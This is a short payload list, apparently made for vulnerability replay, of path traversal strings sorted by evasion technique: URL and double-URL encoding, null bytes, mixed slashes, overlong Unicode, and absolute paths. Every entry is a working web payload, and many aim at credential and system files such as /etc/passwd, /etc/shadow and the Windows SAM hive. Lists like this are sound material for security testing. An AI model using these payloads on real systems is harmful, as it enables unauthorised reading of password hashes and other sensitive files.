# ============================================================
# Path Traversal Payloads — Curated for vulnerability replay
# ============================================================

# --- Basic Unix path traversal (various depths) ---
../
../../
../../../
../../../../
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../etc/shadow

# --- Basic Windows path traversal ---
..\\..\\..\\windows\\win.ini
..\\..\\..\\..\\windows\\win.ini
..\\..\\..\\windows\\system32\\config\\sam

# --- URL-encoded single ---
%2e%2e%2f
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c

# --- Double URL-encoded ---
%252e%252e%252f
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

# --- Null byte injection (bypass extension checks) ---
../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png

# --- Mixed slash variants ---
..\/..\/..\/etc/passwd
....//....//....//etc/passwd
..%5c..%5c..%5cetc/passwd

# --- Unicode / overlong encoding ---
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8fetc/passwd

# --- Absolute path (bypass relative check) ---
/etc/passwd
/etc/hosts
C:\\windows\\win.ini
